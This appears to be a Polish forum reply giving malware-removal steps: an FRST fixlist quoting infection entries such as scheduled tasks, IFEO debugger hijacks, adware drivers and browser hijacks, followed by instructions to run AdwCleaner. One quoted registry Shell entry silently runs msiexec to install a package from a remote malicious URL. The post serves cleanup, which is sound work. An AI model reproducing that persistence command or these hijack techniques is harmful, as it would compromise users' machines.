Odinstaluj Adobe Reader 9 - Polish,AlphaGo,KingCoouPon,Microsoft Security Essentials,mkfabdcpfmdkhlgngccmkbbmideddbig,ProShooppeR,YAC(Yet Another Cleaner!).Otwórz notatnik systemowy i wklej: CloseProcesses: HKU\S-1-5-21-15767563-2575837698-2306030566-1012\...\ChromeHTML: -> C:\Program Files (x86)\Dohat\Application\chrome.exe (Google Inc.) <==== UWAGA ShellIconOverlayIdentifiers: [###MegaShellExtPending] -> {056D528D-CE28-4194-9BA3-BA2E9197FF8C} => -> Brak pliku ShellIconOverlayIdentifiers: [###MegaShellExtSynced] -> {05B38830-F4E9-4329-978B-1DD28605D202} => -> Brak pliku ShellIconOverlayIdentifiers: [###MegaShellExtSyncing] -> {0596C850-7BDD-4C9D-AFDF-873BE6890637} => -> Brak pliku ShellIconOverlayIdentifiers: [00asw] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> Brak pliku ShellIconOverlayIdentifiers: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> Brak pliku ShellIconOverlayIdentifiers: [00avg] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> Brak pliku ContextMenuHandlers1: [###MegaContextMenuExt] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} => -> Brak pliku ContextMenuHandlers3: [00avg] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> Brak pliku ContextMenuHandlers4: [###MegaContextMenuExt] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} => -> Brak pliku Task: {03E24BB8-6710-443B-99A9-E29C35A1B06A} - System32\Tasks\{52362D77-47CA-47A1-A20E-30D89C7E0D74} => "c:\program files (x86)\google\chrome\application\chrome.exe" hxxp://ui.skype.com/ui/0/6.16.0.105/pl/abandoninstall?source=lightinstaller&page=tsInstall Task: {06C78781-3CBD-4BFC-93D6-5B07D580CCCE} - System32\Tasks\{E838EF57-ED9F-449B-BE58-224E18F53F95} => C:\Windows\system32\pcalua.exe -a D:\InstMenu.exe -d D:\ Task: {0B067855-A775-4E5E-B868-BDB0D1053F06} - System32\Tasks\{51A3D2F1-E765-4D92-95EE-EEE741FA51F9} => C:\Program Files (x86)\Rockstar Games\Max Payne 2\MaxPayne2.exe Task: {22D95FBC-679F-4824-94FF-45DDF9EC03D0} - System32\Tasks\{448BF6CA-706B-42FE-A370-EF41DBFDD422} => C:\Windows\system32\pcalua.exe -a D:\ACRD4ENU.EXE -d D:\ Task: {2824044A-3185-44C6-A746-ABC82482CE1C} - System32\Tasks\{CAF5DC9A-AF97-4D07-BFCE-33C6528D8D66} => C:\Windows\system32\pcalua.exe -a H:\chromeinstall-8u51.exe -d H:\ Task: {3458D979-9CA4-4FC9-B1AE-E06583D14FE6} - System32\Tasks\Microsoft\Microsoft Antimalware\MpIdleTask => c:\Program Files\Microsoft Security Client\\MpCmdRun.exe [2016-11-14] (Microsoft Corporation) <==== UWAGA Task: {35889208-7AFD-4F6C-B4D7-088A5650DC3F} - System32\Tasks\{BDBBDFBA-689B-4818-B162-1D766C6B8835} => C:\Windows\system32\pcalua.exe -a C:\Users\Marta\Desktop\chromeinstall-8u51.exe -d C:\Users\Marta\Desktop Task: {35B92EDD-25F4-4F16-82CC-DE03BDB600A2} - System32\Tasks\{9BAA89B6-9B64-4FD7-A897-BCEC08FA6FFA} => C:\Windows\system32\pcalua.exe -a C:\Users\Marta\AppData\Local\10631\a28603.exe -c /uninstall Task: {36374045-B7D8-4968-8CBB-F579D1054DDE} - System32\Tasks\{28CC296F-6D03-4C2C-AB9A-4E812FC4F050} => C:\Users\Szymon\Desktop\java.exe Task: {36CE086C-5F22-4939-9377-D0C7F9830B4D} - System32\Tasks\{FFD11185-643F-4B19-8086-86AA3646B406} => C:\Users\Szymon\Desktop\java.exe Task: {6A73C613-A708-411C-858E-D66D9F35B58E} - System32\Tasks\{1B4CBD32-8982-4BAD-82D2-57C89F0A81D7} => C:\Users\Szymon\Desktop\java.exe Task: {6D0CD6D1-B72D-4D1D-B764-F4FD2A613A2D} - System32\Tasks\{7EDAE4F5-A207-44E4-A7BE-B928988232FB} => C:\Users\Szymon\Desktop\Minecraft.exe Task: {72AB6FC7-884D-4C90-B95C-20529FAF5446} - System32\Tasks\384a2abd-84ad-4fbb-91bb-57738355afae-1-6 => C:\Program Files (x86)\Object Browser\384a2abd-84ad-4fbb-91bb-57738355afae-1-6.exe <==== UWAGA Task: {75884F4C-D400-46FE-A8B6-6FCC7B53B768} - System32\Tasks\{F3E625BD-7F32-45C4-86A5-3B4E4E376DB3} => C:\Users\Szymon\Desktop\Minecraft.exe Task: {77C2111E-46B7-4D9A-8C9E-C77F14F20E4B} - System32\Tasks\384a2abd-84ad-4fbb-91bb-57738355afae-5 => C:\Program Files (x86)\Object Browser\384a2abd-84ad-4fbb-91bb-57738355afae-5.exe <==== UWAGA Task: {7E639796-244F-469E-A66A-838683EF5A53} - System32\Tasks\AVAST Software\Avast settings backup => C:\Program Files\Common Files\AV\avast! Antivirus\backup.exe Task: {9DBB792F-A331-4050-82EF-E02D53F6220E} - System32\Tasks\{60B90A9F-C00E-45EC-9D0E-E58D194D7BE7} => C:\Users\Szymon\Desktop\java.exe Task: {B5745D6C-1AAE-40EF-A43E-D270B51B8EC7} - System32\Tasks\384a2abd-84ad-4fbb-91bb-57738355afae-1-7 => C:\Program Files (x86)\Object Browser\384a2abd-84ad-4fbb-91bb-57738355afae-1-7.exe <==== UWAGA Task: {B8DB9EFD-8E8E-4B98-86C8-95A708DE2C8F} - System32\Tasks\{B5B4232A-F63F-4CC2-AC63-BF973FB38543} => C:\Users\Szymon\Desktop\Minecraft.exe Task: {BB7AF11A-0246-4703-84D6-D69AC22C4BFF} - System32\Tasks\384a2abd-84ad-4fbb-91bb-57738355afae-11 => C:\Program Files (x86)\Object Browser\384a2abd-84ad-4fbb-91bb-57738355afae-11.exe <==== UWAGA Task: {C503B100-96F8-410E-8A33-87783D65CE4E} - System32\Tasks\{E052AB1F-D03D-442C-B8FC-52331DC41294} => C:\Users\Szymon\Desktop\java.exe Task: {C69AC0E5-AFC8-49AE-AD87-0C213FD6D330} - System32\Tasks\384a2abd-84ad-4fbb-91bb-57738355afae-7 => C:\Program Files (x86)\Object Browser\384a2abd-84ad-4fbb-91bb-57738355afae-7.exe <==== UWAGA Task: {C78AB137-B66A-48AC-BD92-40765C08CE86} - System32\Tasks\{5483525A-8139-4E10-9E94-1D34E4EF87CA} => C:\Windows\system32\pcalua.exe -a C:\Users\Szymonek_2\Desktop\Minecraft_1.8_Auto_Installer.exe -d C:\Users\Szymonek_2\Desktop Task: {C9D93819-965D-4BFA-89DE-61AEC3DE08C5} - System32\Tasks\{C995B38C-80F9-4E8C-997E-BBB10079CCC1} => C:\Users\Szymon\Desktop\Minecraft.exe Task: {E00D72EE-D537-4368-9D25-1EA2677E6082} - System32\Tasks\{99AF61B2-A242-47DB-994E-D0279715180D} => C:\Windows\system32\pcalua.exe -a C:\Windows\lsb_un20.exe -c /C=UC /N=SPIDI LICZY Task: {EF75FE7E-919C-4D6F-A602-A3EBA4C01F42} - System32\Tasks\{9EB28F46-C9D6-40A3-8500-344CF7C472F1} => C:\Users\Szymon\Desktop\Minecraft.exe Task: {F23E18F5-CB47-4438-9BF0-7A4EEFECFC08} - System32\Tasks\{00F89229-ABFA-49DD-A032-A5CF46D80A64} => C:\Windows\system32\pcalua.exe -a "C:\Program Files (x86)\Team6 game studios\Battle Metal\Setup.exe" -d "C:\Program Files (x86)\Team6 game studios\Battle Metal" -c /remove Task: {FB9149EA-30B5-4D89-9408-77B799764B5D} - System32\Tasks\384a2abd-84ad-4fbb-91bb-57738355afae-5_user => C:\Program Files (x86)\Object Browser\384a2abd-84ad-4fbb-91bb-57738355afae-5.exe <==== UWAGA Task: {FC917533-A0B9-401C-A8EE-BE61C791CCFC} - System32\Tasks\{7AA0BE48-86DD-4A12-91DE-234904D59004} => C:\Windows\system32\pcalua.exe -a D:\MidnightRacing-Setup.exe -d D:\ Task: {FD45EAFB-BDBD-49BA-9D2A-73F5CACC7C33} - System32\Tasks\384a2abd-84ad-4fbb-91bb-57738355afae-6 => C:\Program Files (x86)\Object Browser\384a2abd-84ad-4fbb-91bb-57738355afae-6.exe <==== UWAGA Task: {FF362FFF-71FF-4555-9029-03608C2C4CFD} - System32\Tasks\Microsoft\Microsoft Antimalware\Microsoft Antimalware Scheduled Scan => c:\Program Files\Microsoft Security Client\\MpCmdRun.exe [2016-11-14] (Microsoft Corporation) <==== UWAGA Task: C:\Windows\Tasks\384a2abd-84ad-4fbb-91bb-57738355afae-1-6.job => C:\Program Files (x86)\Object Browser\384a2abd-84ad-4fbb-91bb-57738355afae-1-6.exe <==== UWAGA Task: C:\Windows\Tasks\384a2abd-84ad-4fbb-91bb-57738355afae-1-7.job => C:\Program Files (x86)\Object Browser\384a2abd-84ad-4fbb-91bb-57738355afae-1-7.exe <==== UWAGA Task: C:\Windows\Tasks\384a2abd-84ad-4fbb-91bb-57738355afae-11.job => C:\Program Files (x86)\Object Browser\384a2abd-84ad-4fbb-91bb-57738355afae-11.exe <==== UWAGA Task: C:\Windows\Tasks\384a2abd-84ad-4fbb-91bb-57738355afae-5.job => C:\Program Files (x86)\Object Browser\384a2abd-84ad-4fbb-91bb-57738355afae-5.exe <==== UWAGA Task: C:\Windows\Tasks\384a2abd-84ad-4fbb-91bb-57738355afae-5_user.job => C:\Program Files (x86)\Object Browser\384a2abd-84ad-4fbb-91bb-57738355afae-5.exe <==== UWAGA Task: C:\Windows\Tasks\384a2abd-84ad-4fbb-91bb-57738355afae-6.job => C:\Program Files (x86)\Object Browser\384a2abd-84ad-4fbb-91bb-57738355afae-6.exe <==== UWAGA Task: C:\Windows\Tasks\384a2abd-84ad-4fbb-91bb-57738355afae-7.job => C:\Program Files (x86)\Object Browser\384a2abd-84ad-4fbb-91bb-57738355afae-7.exe <==== UWAGA Task: C:\Windows\Tasks\UCBrowserUpdater.job => C:\Program Files (x86)\UCBrowser\Application\update_task.exe <==== UWAGA Task: C:\Windows\Tasks\UCBrowserUpdaterCore.job => C:\Program Files (x86)\UCBrowser\Application\update_task.exe <==== UWAGA Shortcut: C:\Users\Szymonek_2\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\9501e18d7c2ab92e\Google Chrome.lnk -> C:\Program Files (x86)\Dohat\Application\chrome.exe (Google Inc.) ShortcutWithArgument: C:\Users\Szymonek_2\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\Google Chrome.lnk -> C:\Program Files (x86)\Dohat\Application\chrome.exe (Google Inc.) -> hxxp://www.yeadesktop.com/ ShortcutWithArgument: C:\Users\Szymonek_2\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\Mozilla Firefox.lnk -> C:\Program Files (x86)\Firefox\Firefox.exe (Mozilla Corporation) -> hxxp://www.yeadesktop.com/ ShortcutWithArgument: C:\Users\Szymonek_2\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\d518b7a3acb83fc2\Google Chrome.lnk -> C:\Program Files (x86)\Dohat\Application\chrome.exe (Google Inc.) -> --profile-directory="Profile 2" Hosts: HKLM-x32\...\Run: [Adobe Reader Speed Launcher] => C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Reader_sl.exe [34672 2008-06-12] (Adobe Systems Incorporated) HKLM-x32\...\Run: [] => [X] HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Ograniczenia <==== UWAGA HKU\S-1-5-21-15767563-2575837698-2306030566-1012\...\Policies\system: [Shell] explorer.exe,msiexec.exe /i hxxp://point.orangeiloveyou.com/?data=zDlkMj1XRWhLNdH8RkJWRWVLMWqdOTI1OWHdMUY2RWRWMWIyMH== /q <==== UWAGA HKU\S-1-5-21-15767563-2575837698-2306030566-1012\...\MountPoints2: F - F:\AutoRun.exe HKU\S-1-5-21-15767563-2575837698-2306030566-1012\...\MountPoints2: H - H:\AutoRun.exe HKU\S-1-5-21-15767563-2575837698-2306030566-1012\...\MountPoints2: {8ce26719-c17c-11e3-bcd9-902b347725b0} - E:\AutoRun.exe HKU\S-1-5-21-15767563-2575837698-2306030566-1012\...\MountPoints2: {b8da9952-30e3-11e4-9f2a-001e101f7fb6} - F:\AutoRun.exe HKU\S-1-5-21-15767563-2575837698-2306030566-1012\...\MountPoints2: {c70271a0-c3e5-11e3-b86d-001e101f36d9} - E:\AutoRun.exe IFEO\DisplaySwitch.exe: [Debugger] IFEO\GoogleUpdate.exe: [Debugger] 324095823984.exe IFEO\GoogleUpdaterService.exe: [Debugger] 8736459873644.exe IFEO\taskmgr.exe: [Debugger] Startup: C:\Users\Marta.Marta-A-PC\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Facebook Gameroom.lnk [2017-04-06] ShortcutTarget: Facebook Gameroom.lnk -> C:\Users\Szymonek_2\AppData\Local\Facebook\Games\FacebookGameroom.exe (Brak pliku) BootExecute: autocheck autochk * aswBoot.exe /M:14944d48 /wow /dir:"C:\Program Files\AVAST Software\Avast" GroupPolicy: Ograniczenia - Chrome <==== UWAGA GroupPolicy\User: Ograniczenia <==== UWAGA CHR HKLM\SOFTWARE\Policies\Google: Ograniczenia <==== UWAGA HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.ourluckysites.com/?type=hp&ts=1494335863&z=78dd262ce36de105fe441a8gdzet0z8c0cew1bbq5m&from=che0812&uid=ST500DM002-1BD142_W2AMFJQNXXXXW2AMFJQN R2 iSafeService; C:\Program Files (x86)\Elex-tech\YAC\iSafeSvc.exe [131024 2016-12-02] (Elex do Brasil Participações Ltda) <==== UWAGA R1 iSafeKrnlKit; C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnlKit.sys [110112 2016-05-23] (Elex do Brasil Participações Ltda) <==== UWAGA R1 iSafeKrnlMon; C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnlMon.sys [52440 2016-05-23] (Elex do Brasil Participações Ltda) <==== UWAGA R1 iSafeKrnlR3; C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnlR3.sys [103904 2016-05-23] (Elex do Brasil Participações Ltda) <==== UWAGA R1 iSafeNetFilter; C:\Windows\System32\DRIVERS\iSafeNetFilter.sys [52392 2016-05-19] (Elex do Brasil Participações Ltda) <==== UWAGA C:\Users\Szymonek_2\AppData\Local\background_fault\aswRD.exe C:\Users\Szymonek_2\AppData\Roaming\mkfabdcpfmdkhlgngccmkbbmideddbig\python\pythonw.exe C:\ProgramData\s7InHeVXu.dat C:\Users\Szymonek_2\SkyLand.exe EmptyTemp: Plik zapisz pod nazwą fixlist.txt i umieść obok FRST w tym samym folderze. Uruchom jako administrator FRST i kliknij w Fix/Napraw. Pobierz i uruchom jako administrator AdwCleaner https://toolslib.net/downloads/finish/1/ Kliknij Scan(Skanuj) i później Cleaning(Oczyść). Pokaż nowe logi z FRST.